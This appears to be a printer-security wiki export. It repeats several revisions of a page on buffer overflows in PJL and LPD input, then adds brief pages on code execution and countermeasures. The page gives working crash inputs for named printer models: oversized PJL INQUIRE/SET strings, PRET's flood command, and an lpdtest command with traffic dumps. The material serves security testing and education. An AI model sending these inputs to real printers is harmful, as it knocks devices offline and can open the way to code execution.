'''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): <syntaxhighlight lang=sh> ./lpdtest.py printer in "`python -c 'print "x"*150'`" </syntaxhighlight> Network traffic: > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- 42bbc0910f86521759cc7557dd6576de38760b49 168 135 2017-01-20T16:20:27Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 
14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. 
printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. 
'''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- b361f31b76f17664fe99af7b11eee92016690731 135 111 2017-01-14T20:02:09Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. 
Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. 
printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. 
'''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- 33bd52d2e41c6ac91d5fbd8c2149063507886545 111 110 2017-01-14T17:40:02Z 134.147.128.156 0 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. 
Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. 
printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. 
'''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- c99322fc4cd0b774c51168e6d22814c861841c2d 110 109 2017-01-14T17:33:51Z 134.147.128.156 0 /* How to test this attack? */ wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. 
Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… === How to test this attack? === Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. 
printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" === Who can perform this attack? === Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. === How to test this attack? 
=== A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. === Who can perform this attack? === Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- b4a2d7f70731d15a3bb2f08ca78bfa2cfd64b9a3 109 65 2017-01-14T17:33:35Z 134.147.128.156 0 /* How to test this attack? */ wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. 
Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… === How to test this attack? === Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. 
printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" === Who can perform this attack? === Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. === How to test this attack? 
=== A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. === Who can perform this attack? === Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- a2be31b24fdf3aea2aeb3bab25225bd38d789434 65 56 2017-01-08T15:41:34Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. 
= Code execution =

''Page: Code execution, last revised 2017-01-15T17:22:19Z''

Any computer system may be prone to malicious code execution. Printers are no exception. While there are numerous potential attack vectors, two standard ways of importing foreign code are present in most of today's printers and MFPs by design: the ability to perform firmware updates and to install additional software packages. Furthermore, a short introduction to the danger of buffer overflows in embedded devices is given.
''Currently, the following techniques to achieve code execution are discussed in this wiki:''

* [[Buffer overflows]] – Smashing the stack based on unsanitized [[LPD]] and [[PJL]] input
* [[Firmware updates]] – Deploying malicious firmware through ordinary print jobs
* [[Software packages]] – Installing custom software on MFPs and printer devices

= Countermeasures =

''Page: Countermeasures, last revised 2017-03-24T10:52:13Z''

Most attacks against printers are enabled because there is no clear distinction between [[Fundamentals#Page_Description_Languages|page description]] and [[Fundamentals#Printer_Control_Languages|printer control]] functionality. Using the very same channel for '''data''' (to be printed) and '''code''' (to control the device) makes printers insecure by design.
Potentially harmful commands can be executed by anyone who has the right to print. Thus there is no silver bullet to counter such design-immanent flaws. There are however various short- and long-term recommendations, best practices and workarounds to mitigate the risks.

== Vendors ==

Printer vendors have gotten themselves into a situation that is not easy to solve. Cutting support for established and reliable languages like [[PostScript]] from one day to the next would break compatibility with existing printer drivers, and updating the PostScript standard is probably not an option. Additional security flaws are introduced through undocumented [[PJL]] extensions, service codes and further proprietary features. In general there is a lot of security by obscurity in the printing industry. Reverse engineering however is not black magic anymore. Vendors need to accept that – sooner or later – someone will discover their ‘hidden functions’ and should instead focus on open, well-studied standards to improve printer security.

When it comes to firmware updates and software packages, digital signatures are often advocated as the single countermeasure. If used correctly, only files originating from the entity in possession of the private key can be installed on the device. Code signing however also means technically restricting users to running vendor software<ref>This issue has also been discussed by the FSF when HP announced to introduce code signing for their printers: ‘[https://www.fsf.org/blogs/licensing/restricted-printers Fixing rogue printers: don't trade one security threat for another]’</ref>. Certainly there are legitimate reasons to execute custom code on a printer. One example is the work of L. Waechter<ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'' (Balanced Distribution of Jobs in a Printer Network), L. Waechter, 2005</ref>, who extended HP LaserJets to support load balancing.
